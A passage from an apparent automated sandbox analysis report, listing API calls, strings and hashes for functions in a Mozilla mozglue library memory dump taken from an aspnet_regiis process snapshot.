                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC70F88
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC70FF7
                                                                                                                            • InitializeConditionVariable.KERNEL32(?), ref: 6CC71067
                                                                                                                            • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6CC710A7
                                                                                                                            • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6CC7114B
                                                                                                                              • Part of subcall function 6CC68AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CC81563), ref: 6CC68BD5
                                                                                                                            • free.MOZGLUE(?), ref: 6CC71174
                                                                                                                            • free.MOZGLUE(?), ref: 6CC71186
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2803333873-0
                                                                                                                            • Opcode ID: 852862184fc52ac8261c51add03f5e0e6c5fdbbd424bdbe937571f31ef98b640
                                                                                                                            • Instruction ID: e9acecb0d87826ea9c3ebe215098acadf45b7c50dc335e4d0bbb5c399ac922e9
                                                                                                                            • Opcode Fuzzy Hash: 852862184fc52ac8261c51add03f5e0e6c5fdbbd424bdbe937571f31ef98b640
                                                                                                                            • Instruction Fuzzy Hash: 0B619A76A043449FDB20CF25D894B9AB7F5FFC5308F04891DE89997611EB31E849CBA2
                                                                                                                            Function 6CC2B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(?,?,?,?,6CC2B61E,?,?,?,?,?,00000000), ref: 6CC2B6AC
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CC2B61E,?,?,?,?,?,00000000), ref: 6CC2B6D1
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6CC2B61E,?,?,?,?,?,00000000), ref: 6CC2B6E3
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6CC2B61E,?,?,?,?,?,00000000), ref: 6CC2B70B
                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6CC2B61E,?,?,?,?,?,00000000), ref: 6CC2B71D
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6CC2B61E), ref: 6CC2B73F
                                                                                                                            • moz_xmalloc.MOZGLUE(80000023,?,?,?,6CC2B61E,?,?,?,?,?,00000000), ref: 6CC2B760
                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6CC2B61E,?,?,?,?,?,00000000), ref: 6CC2B79A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1394714614-0
                                                                                                                            • Opcode ID: 2dbed6493390af19f96abc2d12c8258e9970ec4a1dedf0ff720c44324a2c7546
                                                                                                                            • Instruction ID: a057157b5c77745d150b1d0cbc3f377d55df30d06024b96c4f8e8b7183f76dc5
                                                                                                                            • Opcode Fuzzy Hash: 2dbed6493390af19f96abc2d12c8258e9970ec4a1dedf0ff720c44324a2c7546
                                                                                                                            • Instruction Fuzzy Hash: 5E41B3B2D001159FCB04DF69DC90AAEB7B5BF44324F250629E866E7780F735E90487E1
                                                                                                                            Function 6CC2EF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(6CCA5104), ref: 6CC2EFAC
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CC2EFD7
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC2EFEC
                                                                                                                            • free.MOZGLUE(?), ref: 6CC2F00C
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6CC2F02E
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?), ref: 6CC2F041
                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC2F065
                                                                                                                            • moz_xmalloc.MOZGLUE ref: 6CC2F072
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1148890222-0
                                                                                                                            • Opcode ID: 236eea606a582332af99d1810e0da0c1977e0a494536a1515c995c6e4ed16284
                                                                                                                            • Instruction ID: 4625899b155b74c41396911673770e06930dc5bf2a81ffd3a460d60933dda902
                                                                                                                            • Opcode Fuzzy Hash: 236eea606a582332af99d1810e0da0c1977e0a494536a1515c995c6e4ed16284
                                                                                                                            • Instruction Fuzzy Hash: ED41D3B1A002159FCB18CF78D8809AE7769BF88324B24422CE816DB794FB35E915C7E1
                                                                                                                            Function 6CC9B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6CC9B5B9
                                                                                                                            • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CC9B5C5
                                                                                                                            • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CC9B5DA
                                                                                                                            • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CC9B5F4
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC9B605
                                                                                                                            • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6CC9B61F
                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 6CC9B631
                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC9B655
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1276798925-0
                                                                                                                            • Opcode ID: 49762c248d6fcd34e4a524b980fe90e4b0d4820f40d15dacc4e64cad58225feb
                                                                                                                            • Instruction ID: 4b80641bb95262ec48581c118c3ad388a9aa36297fb78061463c717715bfba75
                                                                                                                            • Opcode Fuzzy Hash: 49762c248d6fcd34e4a524b980fe90e4b0d4820f40d15dacc4e64cad58225feb
                                                                                                                            • Instruction Fuzzy Hash: F531A171F001058FCB10DFE9D8AC9AEBBB5FF8A325B140599D902A7740EB70A816CB91
                                                                                                                            Function 6CC3B790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CC7CC83,?,?,?,?,?,?,?,?,?,6CC7BCAE,?,?,6CC6DC2C), ref: 6CC3B7E6
                                                                                                                            • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CC7CC83,?,?,?,?,?,?,?,?,?,6CC7BCAE,?,?,6CC6DC2C), ref: 6CC3B80C
                                                                                                                            • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6CC7CC83,?,?,?,?,?,?,?,?,?,6CC7BCAE), ref: 6CC3B88E
                                                                                                                            • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6CC7CC83,?,?,?,?,?,?,?,?,?,6CC7BCAE,?,?,6CC6DC2C), ref: 6CC3B896
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 922945588-0
                                                                                                                            • Opcode ID: 484e8398fe78e8292fabcf26363e36a49b11b3c280cd226265d9fc8e31e9e142
                                                                                                                            • Instruction ID: 43ed776ab3d3f9dbc4f9e6190ea76bd63c289ba6389851acea2609898ac77db0
                                                                                                                            • Opcode Fuzzy Hash: 484e8398fe78e8292fabcf26363e36a49b11b3c280cd226265d9fc8e31e9e142
                                                                                                                            • Instruction Fuzzy Hash: FD51BE35B00A148FCB15CF59D4A8A6ABBF5FF89318B69855DE98A87341D730EC01CB80
                                                                                                                            Function 6CC71D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC71D0F
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,6CC71BE3,?,?,6CC71D96,00000000), ref: 6CC71D18
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,6CC71BE3,?,?,6CC71D96,00000000), ref: 6CC71D4C
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC71DB7
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC71DC0
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC71DDA
                                                                                                                              • Part of subcall function 6CC71EF0: GetCurrentThreadId.KERNEL32 ref: 6CC71F03
                                                                                                                              • Part of subcall function 6CC71EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6CC71DF2,00000000,00000000), ref: 6CC71F0C
                                                                                                                              • Part of subcall function 6CC71EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6CC71F20
                                                                                                                            • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6CC71DF4
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1880959753-0
                                                                                                                            • Opcode ID: 87c1706239cb984c314091128de0819c5563eec95594a821748cfc716a3d073e
                                                                                                                            • Instruction ID: adf148efa4bd832830582d96ea0689c4788710a03ecbdb31d7dab46f2fa54c3a
                                                                                                                            • Opcode Fuzzy Hash: 87c1706239cb984c314091128de0819c5563eec95594a821748cfc716a3d073e
                                                                                                                            • Instruction Fuzzy Hash: C141ABB56007049FCB20CF69D598A5ABBF9FF49314F10446DE99A87B41DB31F854CBA0
                                                                                                                            Function 6CC684E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC684F3
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC6850A
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC6851E
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC6855B
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC6856F
                                                                                                                            • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC685AC
                                                                                                                              • Part of subcall function 6CC67670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC685B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC6767F
                                                                                                                              • Part of subcall function 6CC67670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC685B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC67693
                                                                                                                              • Part of subcall function 6CC67670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CC685B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC676A7
                                                                                                                            • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC685B2
                                                                                                                              • Part of subcall function 6CC45E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC45EDB
                                                                                                                              • Part of subcall function 6CC45E90: memset.VCRUNTIME140(6CC87765,000000E5,55CCCCCC), ref: 6CC45F27
                                                                                                                              • Part of subcall function 6CC45E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC45FB2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2666944752-0
                                                                                                                            • Opcode ID: b3e6e74e663525728d55f7dd5da61a0d5cfe4b0295538fd8a0cb55fe024623ba
                                                                                                                            • Instruction ID: b4c181247a004e2438cf0c7c4a6de5bd6489b817c00e2a322de17e75f66975c9
                                                                                                                            • Opcode Fuzzy Hash: b3e6e74e663525728d55f7dd5da61a0d5cfe4b0295538fd8a0cb55fe024623ba
                                                                                                                            • Instruction Fuzzy Hash: BB218B742006018FEB14DB6AD988E6BB7B5AF8530CF24482DE55B83B41EB35E949CB51
                                                                                                                            Function 6CC31640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC31699
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC316CB
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC316D7
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC316DE
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC316E5
                                                                                                                            • VerSetConditionMask.NTDLL ref: 6CC316EC
                                                                                                                            • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC316F9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 375572348-0
                                                                                                                            • Opcode ID: 7fe8e9006a4424e800da90d391f9e326ba8a6996d0b8f6cdb7e7580c4e0c14b5
                                                                                                                            • Instruction ID: c5fe26a0b3ea7242caa0f8522b75e75f07dfe48bceda7ff1dfb480fa11fa807f
                                                                                                                            • Opcode Fuzzy Hash: 7fe8e9006a4424e800da90d391f9e326ba8a6996d0b8f6cdb7e7580c4e0c14b5
                                                                                                                            • Instruction Fuzzy Hash: EF21D2B07402186FEB106BA89C89FBFB37CEF86704F044528F6499B1C0D6749D5487A1
                                                                                                                            Function 6CC6F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC5CBE8: GetCurrentProcess.KERNEL32(?,6CC231A7), ref: 6CC5CBF1
                                                                                                                              • Part of subcall function 6CC5CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC231A7), ref: 6CC5CBFA
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC34A68), ref: 6CC6945E
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC69470
                                                                                                                              • Part of subcall function 6CC69420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC69482
                                                                                                                              • Part of subcall function 6CC69420: __Init_thread_footer.LIBCMT ref: 6CC6949F
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F619
                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CC6F598), ref: 6CC6F621
                                                                                                                              • Part of subcall function 6CC694D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC694EE
                                                                                                                              • Part of subcall function 6CC694D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC69508
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC6F637
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8,?,?,00000000,?,6CC6F598), ref: 6CC6F645
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8,?,?,00000000,?,6CC6F598), ref: 6CC6F663
                                                                                                                            Strings
                                                                                                                            • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CC6F62A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                            • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                            • API String ID: 1579816589-753366533
                                                                                                                            • Opcode ID: 1f48e1927f3b39c4c404a9a203ae86ae31bb3ea40e8a336d3e84d7cadbdd3c87
                                                                                                                            • Instruction ID: 9ba36829779228a09969d0cb535d81e41e5821e100e83222fcc286a4de6c98e2
                                                                                                                            • Opcode Fuzzy Hash: 1f48e1927f3b39c4c404a9a203ae86ae31bb3ea40e8a336d3e84d7cadbdd3c87
                                                                                                                            • Instruction Fuzzy Hash: 8111CD75205105AFC7049F99D95C9E97779FF86758B500015EA0587F01DB71EC15CBB0
                                                                                                                            Function 6CC31FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC5AB89: EnterCriticalSection.KERNEL32(6CCAE370,?,?,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB94
                                                                                                                              • Part of subcall function 6CC5AB89: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5ABD1
                                                                                                                            • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6CC31FDE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6CC31FFD
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC32011
                                                                                                                            • FreeLibrary.KERNEL32 ref: 6CC32059
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                            • String ID: CoCreateInstance$combase.dll
                                                                                                                            • API String ID: 4190559335-2197658831
                                                                                                                            • Opcode ID: f13697a4514b1bb7206d2d09ad11d0b3099aa89a075ae98f9dfdca457553acc6
                                                                                                                            • Instruction ID: cbe96d06310631f0966b06c89052877ec986a12f7dfdca6cfa4bb474ea02b978
                                                                                                                            • Opcode Fuzzy Hash: f13697a4514b1bb7206d2d09ad11d0b3099aa89a075ae98f9dfdca457553acc6
                                                                                                                            • Instruction Fuzzy Hash: 2E118E74201205AFDF20CF95E86CE9E7B7AEB86356F008029F95983641E7309816EFE0
                                                                                                                            Function 6CC30EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6CC5AB89: EnterCriticalSection.KERNEL32(6CCAE370,?,?,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284), ref: 6CC5AB94
                                                                                                                              • Part of subcall function 6CC5AB89: LeaveCriticalSection.KERNEL32(6CCAE370,?,6CC234DE,6CCAF6CC,?,?,?,?,?,?,?,6CC23284,?,?,6CC456F6), ref: 6CC5ABD1
                                                                                                                            • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6CC5D9F0,00000000), ref: 6CC30F1D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6CC30F3C
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC30F50
                                                                                                                            • FreeLibrary.KERNEL32(?,6CC5D9F0,00000000), ref: 6CC30F86
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
